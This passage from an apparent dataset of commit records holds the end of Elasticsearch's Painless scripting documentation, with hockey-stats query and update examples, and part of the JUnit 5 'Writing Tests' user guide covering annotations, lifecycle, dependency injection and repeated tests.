non-backwards compatible ways if required.]\n\n_Painless_ is a simple, secure scripting language available in Elasticsearch\nby default. It is designed specifically for use with Elasticsearch and can\nsafely be used with `inline` and `stored` scripting, which is enabled by\ndefault.\n\nThe Painless syntax is similar to http:\/\/groovy-lang.org\/index.html[Groovy].\n\nYou can use Painless anywhere a script can be used in Elasticsearch. 
It is the\ndefault if you don't set the `lang` parameter but if you want to be explicit you\ncan set the `lang` parameter to `painless`.\n\n[[painless-features]]\n[float]\n== Painless Features\n\n* Fast performance: https:\/\/benchmarks.elastic.co\/index.html#search_qps_scripts[several times faster] than the alternatives.\n\n* Safety: Fine-grained whitelist with method call\/field granularity. See\n<<painless-api-reference>> for a complete list of available classes and methods.\n\n* Optional typing: Variables and parameters can use explicit types or the dynamic `def` type.\n\n* Syntax: Extends Java's syntax with a subset of Groovy for ease of use. See the <<modules-scripting-painless-syntax, Syntax Overview>>.\n\n* Optimizations: Designed specifically for Elasticsearch scripting.\n\n[[painless-examples]]\n[float]\n== Painless Examples\n\nTo illustrate how Painless works, let's load some hockey stats into an Elasticsearch index:\n\n[source,js]\n----------------------------------------------------------------\nPUT hockey\/player\/_bulk?refresh\n{\"index\":{\"_id\":1}}\n{\"first\":\"johnny\",\"last\":\"gaudreau\",\"goals\":[9,27,1],\"assists\":[17,46,0],\"gp\":[26,82,1],\"born\":\"1993\/08\/13\"}\n{\"index\":{\"_id\":2}}\n{\"first\":\"sean\",\"last\":\"monohan\",\"goals\":[7,54,26],\"assists\":[11,26,13],\"gp\":[26,82,82],\"born\":\"1994\/10\/12\"}\n{\"index\":{\"_id\":3}}\n{\"first\":\"jiri\",\"last\":\"hudler\",\"goals\":[5,34,36],\"assists\":[11,62,42],\"gp\":[24,80,79],\"born\":\"1984\/01\/04\"}\n{\"index\":{\"_id\":4}}\n{\"first\":\"micheal\",\"last\":\"frolik\",\"goals\":[4,6,15],\"assists\":[8,23,15],\"gp\":[26,82,82],\"born\":\"1988\/02\/17\"}\n{\"index\":{\"_id\":5}}\n{\"first\":\"sam\",\"last\":\"bennett\",\"goals\":[5,0,0],\"assists\":[8,1,0],\"gp\":[26,1,0],\"born\":\"1996\/06\/20\"}\n{\"index\":{\"_id\":6}}\n{\"first\":\"dennis\",\"last\":\"wideman\",\"goals\":[0,26,15],\"assists\":[11,30,24],\"gp\":[26,81,82],\"born\":\"1983\/03\/20\"}\n{\"index\":{\"_id\":7}}\n{\"first\":\"david\",\"last\":\"jones\",\"goals\":[7,19,5],\"assists\":[3,17,4],\"gp\":[26,45,34],\"born\":\"1984\/08\/10\"}\n{\"index\":{\"_id\":8}}\n{\"first\":\"tj\",\"last\":\"brodie\",\"goals\":[2,14,7],\"assists\":[8,42,30],\"gp\":[26,82,82],\"born\":\"1990\/06\/07\"}\n{\"index\":{\"_id\":39}}\n{\"first\":\"mark\",\"last\":\"giordano\",\"goals\":[6,30,15],\"assists\":[3,30,24],\"gp\":[26,60,63],\"born\":\"1983\/10\/03\"}\n{\"index\":{\"_id\":10}}\n{\"first\":\"mikael\",\"last\":\"backlund\",\"goals\":[3,15,13],\"assists\":[6,24,18],\"gp\":[26,82,82],\"born\":\"1989\/03\/17\"}\n{\"index\":{\"_id\":11}}\n{\"first\":\"joe\",\"last\":\"colborne\",\"goals\":[3,18,13],\"assists\":[6,20,24],\"gp\":[26,67,82],\"born\":\"1990\/01\/30\"}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\n[float]\n=== Accessing Doc Values from Painless\n\nDocument values can be accessed from a `Map` named `doc`.\n\nFor example, the following script calculates a player's total goals. 
This example uses a strongly typed `int` and a `for` loop.\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"function_score\": {\n \"script_score\": {\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"int total = 0; for (int i = 0; i < doc['goals'].length; ++i) { total += doc['goals'][i]; } return total;\"\n }\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nAlternatively, you could do the same thing using a script field instead of a function score:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"match_all\": {}\n },\n \"script_fields\": {\n \"total_goals\": {\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"int total = 0; for (int i = 0; i < doc['goals'].length; ++i) { total += doc['goals'][i]; } return total;\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nThe following example uses a Painless script to sort the players by their combined first and last names. The names are accessed using\n`doc['first'].value` and `doc['last'].value`.\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"query\": {\n \"match_all\": {}\n },\n \"sort\": {\n \"_script\": {\n \"type\": \"string\",\n \"order\": \"asc\",\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"doc['first.keyword'].value + ' ' + doc['last.keyword'].value\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n=== Updating Fields with Painless\n\nYou can also easily update fields. You access the original source for a field as `ctx._source.<field-name>`.\n\nFirst, let's look at the source data for a player by submitting the following request:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"stored_fields\": [\n \"_id\",\n \"_source\"\n ],\n \"query\": {\n \"term\": {\n \"_id\": 1\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nTo change player 1's last name to `hockey`, simply set `ctx._source.last` to the new value:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/1\/_update\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = params.last\",\n \"params\": {\n \"last\": \"hockey\"\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nYou can also add fields to a document. 
For example, this script adds a new field that contains\nthe player's nickname, _hockey_.\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/1\/_update\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = params.last; ctx._source.nick = params.nick\",\n \"params\": {\n \"last\": \"gaudreau\",\n \"nick\": \"hockey\"\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[modules-scripting-painless-dates]]\n=== Dates\n\nDate fields are exposed as\n<<painless-api-reference-org-joda-time-ReadableDateTime, `ReadableDateTime`>>s\nso they support methods like\n<<painless-api-reference-org-joda-time-ReadableDateTime-getYear-0, `getYear`>>,\nand\n<<painless-api-reference-org-joda-time-ReadableDateTime-getDayOfWeek-0, `getDayOfWeek`>>.\nTo get milliseconds since epoch call\n<<painless-api-reference-org-joda-time-ReadableInstant-getMillis-0, `getMillis`>>.\nFor example, the following returns every hockey player's birth year:\n\n[source,js]\n----------------------------------------------------------------\nGET hockey\/_search\n{\n \"script_fields\": {\n \"birth_year\": {\n \"script\": {\n \"inline\": \"doc.born.value.year\"\n }\n }\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n[float]\n[[modules-scripting-painless-regex]]\n=== Regular expressions\n\nNOTE: Regexes are disabled by default because they circumvent Painless's\nprotection against long running and memory hungry scripts. To make matters\nworse even innocuous looking regexes can have staggering performance and stack\ndepth behavior. They remain an amazing powerful tool but are too scary to enable\nby default. To enable them yourself set `script.painless.regex.enabled: true` in\n`elasticsearch.yml`. We'd like very much to have a safe alternative\nimplementation that can be enabled by default so check this space for later\ndevelopments!\n\nPainless's native support for regular expressions has syntax constructs:\n\n* `\/pattern\/`: Pattern literals create patterns. This is the only way to create\na pattern in painless. 
The pattern inside the ++\/++'s are just\nhttp:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/regex\/Pattern.html[Java regular expressions].\nSee <<modules-scripting-painless-regex-flags>> for more.\n* `=~`: The find operator return a `boolean`, `true` if a subsequence of the\ntext matches, `false` otherwise.\n* `==~`: The match operator returns a `boolean`, `true` if the text matches,\n`false` if it doesn't.\n\nUsing the find operator (`=~`) you can update all hockey players with \"b\" in\ntheir last name:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"if (ctx._source.last =~ \/b\/) {ctx._source.last += \\\"matched\\\"} else {ctx.op = 'noop'}\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nUsing the match operator (`==~`) you can update all the hockey players who's\nnames start with a consonant and end with a vowel:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"if (ctx._source.last ==~ \/[^aeiou].*[aeiou]\/) {ctx._source.last += \\\"matched\\\"} else {ctx.op = 'noop'}\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nYou can use the `Pattern.matcher` directly to get a `Matcher` instance and\nremove all of the vowels in all of their last names:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = \/[aeiou]\/.matcher(ctx._source.last).replaceAll('')\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n`Matcher.replaceAll` is just a call to Java's `Matcher`'s\nhttp:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/regex\/Matcher.html#replaceAll-java.lang.String-[replaceAll]\nmethod so it supports `$1` and `\\1` for replacements:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = \/n([aeiou])\/.matcher(ctx._source.last).replaceAll('$1')\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nIf you need more control over replacements you can call `replaceAll` on a\n`CharSequence` with a `Function<Matcher, String>` that builds the replacement.\nThis does not support `$1` or `\\1` to access replacements because you already\nhave a reference to the matcher and can get them with `m.group(1)`.\n\nIMPORTANT: Calling `Matcher.find` inside of the function that builds the\nreplacement is rude and will likely break the replacement process.\n\nThis will make all of the vowels in the hockey player's last names upper case:\n\n[source,js]\n----------------------------------------------------------------\nPOST hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = ctx._source.last.replaceAll(\/[aeiou]\/, m -> m.group().toUpperCase(Locale.ROOT))\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\nOr you can use the `CharSequence.replaceFirst` to make the first vowel in their\nlast names upper case:\n\n[source,js]\n----------------------------------------------------------------\nPOST 
hockey\/player\/_update_by_query\n{\n \"script\": {\n \"lang\": \"painless\",\n \"inline\": \"ctx._source.last = ctx._source.last.replaceFirst(\/[aeiou]\/, m -> m.group().toUpperCase(Locale.ROOT))\"\n }\n}\n----------------------------------------------------------------\n\/\/ CONSOLE\n\n\nNote: all of the `_update_by_query` examples above could really do with a\n`query` to limit the data that they pull back. While you *could* use a\n<<query-dsl-script-query>> it wouldn't be as efficient as using any other query\nbecause script queries aren't able to use the inverted index to limit the\ndocuments that they have to check.\n\n[float]\n[[modules-scripting-painless-dispatch]]\n=== How painless dispatches functions\n\nPainless uses receiver, name, and https:\/\/en.wikipedia.org\/wiki\/Arity[arity] to\nfor method dispatch. For example, `s.foo(a, b)` is resolved by first getting\nthe class of `s` and then looking up the method `foo` with two parameters. This\nis different from Groovy which uses the\nhttps:\/\/en.wikipedia.org\/wiki\/Multiple_dispatch[runtime types] of the\nparameters and Java which uses the compile time types of the parameters.\n\nThe consequence of this that Painless doesn't support overloaded methods like\nJava, leading to some trouble when it whitelists classes from the Java\nstandard library. For example, in Java and Groovy, `Matcher` has two methods:\n`group(int)` and `group(String)`. Painless can't whitelist both of them methods\nbecause they have the same name and the same number of parameters. So instead it\nhas <<painless-api-reference-Matcher-group-1, `group(int)`>> and\n<<painless-api-reference-Matcher-namedGroup-1, `namedGroup(String)`>>.\n\nWe have a few justifications for this different way of dispatching methods:\n\n1. It makes operating on `def` types simpler and, presumably, faster. Using\nreceiver, name, and arity means when Painless sees a call on a `def` objects it\ncan dispatch the appropriate method without having to do expensive comparisons\nof the types of the parameters. The same is true for invocations with `def`\ntyped parameters.\n2. It keeps things consistent. It would be genuinely weird for Painless to\nbehave like Groovy if any `def` typed parameters were involved and Java\notherwise. It'd be slow for it to behave like Groovy all the time.\n3. It keeps Painless maintainable. Adding the Java or Groovy like method\ndispatch *feels* like it'd add a ton of complexity which'd make maintenance and\nother improvements much more difficult.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf06d2073bff161f1df2749d6626682683df1041","subject":"Document @TestInstance lifecycle support in the User Guide","message":"Document @TestInstance lifecycle support in the User Guide\n\nIssue #419\n","repos":"sbrannen\/junit-lambda,junit-team\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/writing-tests.adoc","new_file":"documentation\/src\/docs\/asciidoc\/writing-tests.adoc","new_contents":"[[writing-tests]]\n== Writing Tests\n\n[source,java,indent=0]\n.A first test case\n----\ninclude::{testDir}\/example\/FirstJUnit5Tests.java[tags=user_guide]\n----\n\n[[writing-tests-annotations]]\n=== Annotations\n\nJUnit Jupiter supports the following annotations for configuring tests and extending the framework.\n\nAll core annotations are located in the `{api-package}` package in the `junit-jupiter-api`\nmodule.\n\n[cols=\"20,80\"]\n|===\n| Annotation | Description\n\n| `@Test` | Denotes that a method is a test method. 
Unlike JUnit 4's `@Test` annotation, this annotation does not declare any attributes, since test extensions in JUnit Jupiter operate based on their own dedicated annotations.\n| `@RepeatedTest` | Denotes that a method is a test template for a <<writing-tests-repeated-tests, repeated test>>\n| `@TestFactory` | Denotes that a method is a test factory for <<writing-tests-dynamic-tests, dynamic tests>>\n| `@TestInstance` | Used to configure the <<writing-tests-test-instance-lifecycle, test instance lifecycle>> for the annotated test class\n| `@DisplayName` | Declares a custom display name for the test class or test method\n| `@BeforeEach` | Denotes that the annotated method should be executed _before_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@Before`. Such methods are _inherited_.\n| `@AfterEach` | Denotes that the annotated method should be executed _after_ *each* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, or `@TestFactory` method in the current class; analogous to JUnit 4's `@After`. Such methods are _inherited_.\n| `@BeforeAll` | Denotes that the annotated method should be executed _before_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@BeforeClass`. Such methods are _inherited_ and must be `static` unless the test class is annotated with `@TestInstance(Lifecycle.PER_CLASS)`.\n| `@AfterAll` | Denotes that the annotated method should be executed _after_ *all* `@Test`, `@RepeatedTest`, `@ParameterizedTest`, and `@TestFactory` methods in the current class; analogous to JUnit 4's `@AfterClass`. Such methods are _inherited_ and must be `static` unless the test class is annotated with `@TestInstance(Lifecycle.PER_CLASS)`.\n| `@Nested` | Denotes that the annotated class is a nested, non-static test class. `@BeforeAll` and `@AfterAll` methods cannot be used in a `@Nested` test class unless it is annotated with `@TestInstance(Lifecycle.PER_CLASS)`.\n| `@Tag` | Used to declare _tags_ for filtering tests, either at the class or method level; analogous to test groups in TestNG or Categories in JUnit 4\n| `@Disabled` | Used to _disable_ a test class or test method; analogous to JUnit 4's `@Ignore`\n| `@ExtendWith` | Used to register custom <<extensions,extensions>>\n|===\n\n[[writing-tests-meta-annotations]]\n==== Meta-Annotations and Composed Annotations\n\nJUnit Jupiter annotations can be used as _meta-annotations_. That means that you can define\nyour own _composed annotation_ that will automatically _inherit_ the semantics of its\nmeta-annotations.\n\nFor example, instead of copying and pasting `@Tag(\"fast\")` throughout your code base (see\n<<writing-tests-tagging-and-filtering>>), you can create a custom _composed annotation_ named `@Fast`\nas follows. 
`@Fast` can then be used as a drop-in replacement for `@Tag(\"fast\")`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/Fast.java[tags=user_guide]\n----\n\n[[writing-tests-standard]]\n=== Standard Test Class\n\n[source,java,indent=0]\n.A standard test case\n----\ninclude::{testDir}\/example\/StandardTests.java[tags=user_guide]\n----\n\nNOTE: Neither test classes nor test methods need to be `public`.\n\n[[writing-tests-display-names]]\n=== Display Names\n\nTest classes and test methods can declare custom display names -- with spaces, special\ncharacters, and even emojis -- that will be displayed by test runners and test reporting.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisplayNameDemo.java[tags=user_guide]\n----\n\n[[writing-tests-assertions]]\n=== Assertions\n\nJUnit Jupiter comes with many of the assertion methods that JUnit 4 has and adds a few\nthat lend themselves well to being used with Java 8 lambdas. All JUnit Jupiter assertions\nare `static` methods in the `{Assertions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssertionsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-assertions-third-party]]\n==== Third-party Assertion Libraries\n\nEven though the assertion facilities provided by JUnit Jupiter are sufficient for many\ntesting scenarios, there are times when more power and additional functionality such as\n_matchers_ are desired or required. In such cases, the JUnit team recommends the use of\nthird-party assertion libraries such as {AssertJ}, {Hamcrest}, {Truth}, etc. Developers\nare therefore free to use the assertion library of their choice.\n\nFor example, the combination of _matchers_ and a fluent API can be used to make\nassertions more descriptive and readable. However, JUnit Jupiter's `{Assertions}` class\ndoes not provide an\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/junit\/Assert.html#assertThat[`assertThat()`]\nmethod like the one found in JUnit 4's `org.junit.Assert` class which accepts a Hamcrest\nhttp:\/\/junit.org\/junit4\/javadoc\/latest\/org\/hamcrest\/Matcher.html[`Matcher`]. Instead,\ndevelopers are encouraged to use the built-in support for matchers provided by third-party\nassertion libraries.\n\nThe following example demonstrates how to use the `assertThat()` support from Hamcrest in\na JUnit Jupiter test. As long as the Hamcrest library has been added to the classpath,\nyou can statically import methods such as `assertThat()`, `is()`, and `equalTo()` and\nthen use them in tests like in the `assertWithHamcrestMatcher()` method below.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/HamcrestAssertionDemo.java[tags=user_guide]\n----\n\nNaturally, legacy tests based on the JUnit 4 programming model can continue using\n`org.junit.Assert#assertThat`.\n\n[[writing-tests-assumptions]]\n=== Assumptions\n\nJUnit Jupiter comes with a subset of the assumption methods that JUnit 4 provides and adds a\nfew that lend themselves well to being used with Java 8 lambdas. 
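For example, here is a minimal sketch of both flavors of assumption. It is our own illustration rather than part of the bundled demo, and the `ENV` environment variable check is purely an assumed example condition:

[source,java,indent=0]
----
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assumptions.assumeTrue;
import static org.junit.jupiter.api.Assumptions.assumingThat;

import org.junit.jupiter.api.Test;

class AssumptionsSketch {

	@Test
	void onlyOnCiServer() {
		// Aborts (rather than fails) the test when the assumption does not hold.
		assumeTrue("CI".equals(System.getenv("ENV")));
		// remainder of test only runs on the CI server
	}

	@Test
	void inAllEnvironments() {
		// The lambda is executed only when the assumption holds;
		// code after assumingThat() runs in every environment.
		assumingThat("CI".equals(System.getenv("ENV")),
			() -> assertEquals(2, 1 + 1));
	}
}
----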
All JUnit Jupiter assumptions\nare static methods in the `{Assumptions}` class.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/AssumptionsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-disabling]]\n=== Disabling Tests\n\nHere's a disabled test case.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledClassDemo.java[tags=user_guide]\n----\n\nAnd here's a test case with a disabled test method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/DisabledTestsDemo.java[tags=user_guide]\n----\n\n[[writing-tests-tagging-and-filtering]]\n=== Tagging and Filtering\n\nTest classes and methods can be tagged. Those tags can later be used to filter\n<<running-tests,test discovery and execution>>.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TaggingDemo.java[tags=user_guide]\n----\n\n[[writing-tests-test-instance-lifecycle]]\n=== Test Instance Lifecycle\n\nIn order to allow individual test methods to be executed in isolation and to avoid\nunexpected side effects due to mutable test instance state, JUnit creates a new instance\nof each test class before executing each _test_ method (see note below for what qualifies\nas a _test_ method). This \"per-method\" test instance lifecycle is the default behavior in\nJUnit Jupiter and is analogous to the behavior of all previous versions of JUnit.\n\nIf you would prefer that JUnit Jupiter execute all test methods on the same test\ninstance, simply annotate your test class with `@TestInstance(Lifecycle.PER_CLASS)`. When\nusing this mode, a new test instance will be created once per test class. Thus, if your\ntest methods rely on state stored in instance variables, you may need to reset that state\nin `@BeforeEach` or `@AfterEach` methods.\n\nThe \"per-class\" mode has some additional benefits over the default \"per-method\" mode.\nSpecifically, with the \"per-class\" mode it becomes possible to declare `@BeforeAll` and\n`@AfterAll` on non-static methods as well as on interface `default` methods. The\n\"per-class\" mode therefore also makes it possible to use `@BeforeAll` and `@AfterAll`\nmethods in `@Nested` test classes.\n\nIf you are authoring tests using the Kotlin programming language, you may also find it\neasier to implement `@BeforeAll` and `@AfterAll` methods by switching to the \"per-class\"\ntest instance lifecycle mode.\n\nNOTE: In the context of test instance lifecycle, a _test_ method is any method annotated\nwith `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`, or `@TestTemplate`.\n\n[[writing-tests-nested]]\n=== Nested Tests\n\nNested tests give the test writer more capabilities to express the relationship among\nseveral groups of tests. Here's an elaborate example.\n\n[source,java,indent=0]\n.Nested test suite for testing a stack\n----\ninclude::{testDir}\/example\/TestingAStackDemo.java[tags=user_guide]\n----\n\nNOTE: _Only non-static nested classes_ (i.e. _inner classes_) can serve as `@Nested` test\nclasses. Nesting can be arbitrarily deep, and those inner classes are considered to be\nfull members of the test class family with one exception: `@BeforeAll` and `@AfterAll`\nmethods do not work _by default_. The reason is that Java does not allow `static` members\nin inner classes. 
However, this restriction can be circumvented by annotating a `@Nested`\ntest class with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>).\n\n[[writing-tests-dependency-injection]]\n=== Dependency Injection for Constructors and Methods\n\nIn all prior JUnit versions, test constructors or methods were not allowed to have\nparameters (at least not with the standard `Runner` implementations). As one of the major\nchanges in JUnit Jupiter, both test constructors and methods are now permitted to have\nparameters. This allows for greater flexibility and enables _Dependency Injection_ for\nconstructors and methods.\n\n`{ParameterResolver}` defines the API for test extensions that wish to _dynamically_\nresolve parameters at runtime. If a test constructor or a `@Test`, `@TestFactory`,\n`@BeforeEach`, `@AfterEach`, `@BeforeAll`, or `@AfterAll` method accepts a parameter, the\nparameter must be resolved at runtime by a registered `ParameterResolver`.\n\nThere are currently three built-in resolvers that are registered automatically.\n\n* `{TestInfoParameterResolver}`: if a method parameter is of type `{TestInfo}`, the\n `TestInfoParameterResolver` will supply an instance of `TestInfo` corresponding to the\n current test as the value for the parameter. The `TestInfo` can then be used to retrieve\n information about the current test such as the test's display name, the test class, the\n test method, or associated tags. The display name is either a technical name, such as\n the name of the test class or test method, or a custom name configured via `@DisplayName`.\n+\n`{TestInfo}` acts as a drop-in replacement for the `TestName` rule from JUnit 4. The\nfollowing demonstrates how to have `TestInfo` injected into a test constructor,\n`@BeforeEach` method, and `@Test` method.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestInfoDemo.java[tags=user_guide]\n----\n\n* `RepetitionInfoParameterResolver`: if a method parameter in a `@RepeatedTest`,\n `@BeforeEach`, or `@AfterEach` method is of type `{RepetitionInfo}`, the\n `RepetitionInfoParameterResolver` will supply an instance of `RepetitionInfo`.\n `RepetitionInfo` can then be used to retrieve information about the current repetition\n and the total number of repetitions for the corresponding `@RepeatedTest`. Note,\n however, that `RepetitionInfoParameterResolver` is not registered outside the context\n of a `@RepeatedTest`. 
See <<writing-tests-repeated-tests-examples>>.\n\n* `{TestReporterParameterResolver}`: if a method parameter is of type `{TestReporter}`, the\n `TestReporterParameterResolver` will supply an instance of `TestReporter`.\n The `TestReporter` can be used to publish additional data about the current test run.\n The data can be consumed through `{TestExecutionListener}.reportingEntryPublished()` and thus\n be viewed by IDEs or included in reports.\n+\nIn JUnit Jupiter you should use `TestReporter` where\nyou used to print information to `stdout` or `stderr` in JUnit 4.\nUsing `@RunWith(JUnitPlatform.class)` will even output all reported entries to `stdout`.\n\n[source,java,indent=0]\n----\ninclude::{testDir}\/example\/TestReporterDemo.java[tags=user_guide]\n----\n\nNOTE: Other parameter resolvers must be explicitly enabled by registering appropriate\n<<extensions,extensions>> via `@ExtendWith`.\n\nCheck out the `{MockitoExtension}` for an example of a custom `{ParameterResolver}`.\nWhile not intended to be production-ready, it demonstrates the simplicity and\nexpressiveness of both the extension model and the parameter resolution process.\n`MyMockitoTest` demonstrates how to inject Mockito mocks into `@BeforeEach` and `@Test`\nmethods.\n\n[source,java,indent=0]\n----\nimport static org.junit.jupiter.api.Assertions.assertEquals;\nimport static org.mockito.Mockito.when;\n\nimport org.junit.jupiter.api.BeforeEach;\nimport org.junit.jupiter.api.Test;\nimport org.junit.jupiter.api.extension.ExtendWith;\nimport org.mockito.Mock;\nimport com.example.Person;\nimport com.example.mockito.MockitoExtension;\n\n@ExtendWith(MockitoExtension.class)\nclass MyMockitoTest {\n\n\t@BeforeEach\n\tvoid init(@Mock Person person) {\n\t\twhen(person.getName()).thenReturn(\"Dilbert\");\n\t}\n\n\t@Test\n\tvoid simpleTestWithInjectedMock(@Mock Person person) {\n\t\tassertEquals(\"Dilbert\", person.getName());\n\t}\n\n}\n----\n\n[[writing-tests-test-interfaces-and-default-methods]]\n=== Test Interfaces and Default Methods\n\nJUnit Jupiter allows `@Test`, `@RepeatedTest`, `@ParameterizedTest`, `@TestFactory`,\n`@TestTemplate`, `@BeforeEach`, and `@AfterEach` to be declared on interface `default`\nmethods. `@BeforeAll` and `@AfterAll` can either be declared on `static` methods in a\ntest interface or on interface `default` methods _if_ the concrete test class is\nannotated with `@TestInstance(Lifecycle.PER_CLASS)` (see\n<<writing-tests-test-instance-lifecycle>>). Here are some examples.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestLifecycleLogger.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDynamicTestsDemo.java[tags=user_guide]\n----\n\n`@ExtendWith` and `@Tag` can be declared on a test interface so that classes that\nimplement the interface automatically inherit its tags and extensions. 
See\n<<extensions-lifecycle-callbacks-before-after-execution>> for the source code of the\n<<extensions-lifecycle-callbacks-timing-extension, TimingExtension>>.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TimeExecutionLogger.java[tags=user_guide]\n----\n\nIn your test class you can then implement these test interfaces to have them applied.\n\n[source,java]\n----\ninclude::{testDir}\/example\/testinterface\/TestInterfaceDemo.java[tags=user_guide]\n----\n\nRunning the `TestInterfaceDemo` results in output similar to the following:\n\n....\n:junitPlatformTest\nINFO example.TestLifecycleLogger - Before all tests\nINFO example.TestLifecycleLogger - About to execute [dynamicTestsFromCollection()]\nINFO example.TimingExtension - Method [dynamicTestsFromCollection] took 13 ms.\nINFO example.TestLifecycleLogger - Finished executing [dynamicTestsFromCollection()]\nINFO example.TestLifecycleLogger - About to execute [isEqualValue()]\nINFO example.TimingExtension - Method [isEqualValue] took 1 ms.\nINFO example.TestLifecycleLogger - Finished executing [isEqualValue()]\nINFO example.TestLifecycleLogger - After all tests\n\nTest run finished after 190 ms\n[ 3 containers found ]\n[ 0 containers skipped ]\n[ 3 containers started ]\n[ 0 containers aborted ]\n[ 3 containers successful ]\n[ 0 containers failed ]\n[ 3 tests found ]\n[ 0 tests skipped ]\n[ 3 tests started ]\n[ 0 tests aborted ]\n[ 3 tests successful ]\n[ 0 tests failed ]\n\nBUILD SUCCESSFUL\n....\n\nAnother possible application of this feature is to write tests for interface contracts.\nFor example, you can write tests for how implementations of `Object.equals` or\n`Comparable.compareTo` should behave as follows.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/Testable.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/EqualsContract.java[tags=user_guide]\n----\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/ComparableContract.java[tags=user_guide]\n----\n\nIn your test class you can then implement both contract interfaces thereby inheriting the\ncorresponding tests. Of course you'll have to implement the abstract methods.\n\n[source,java]\n----\ninclude::{testDir}\/example\/defaultmethods\/StringTests.java[tags=user_guide]\n----\n\nNOTE: The above tests are merely meant as examples and therefore not complete.\n\n\n[[writing-tests-repeated-tests]]\n=== Repeated Tests\n\nJUnit Jupiter provides the ability to repeat a test a specified number of times simply by\nannotating a method with `@RepeatedTest` and specifying the total number of repetitions\ndesired. Each invocation of a repeated test behaves like the execution of a regular\n`@Test` method with full support for the same lifecycle callbacks and extensions.\n\nThe following example demonstrates how to declare a test named `repeatedTest()` that\nwill be automatically repeated 10 times.\n\n[source,java]\n----\n@RepeatedTest(10)\nvoid repeatedTest() {\n\t\/\/ ...\n}\n----\n\nIn addition to specifying the number of repetitions, a custom display name can be\nconfigured for each repetition via the `name` attribute of the `@RepeatedTest`\nannotation. Furthermore, the display name can be a pattern composed of a combination of\nstatic text and dynamic placeholders. 
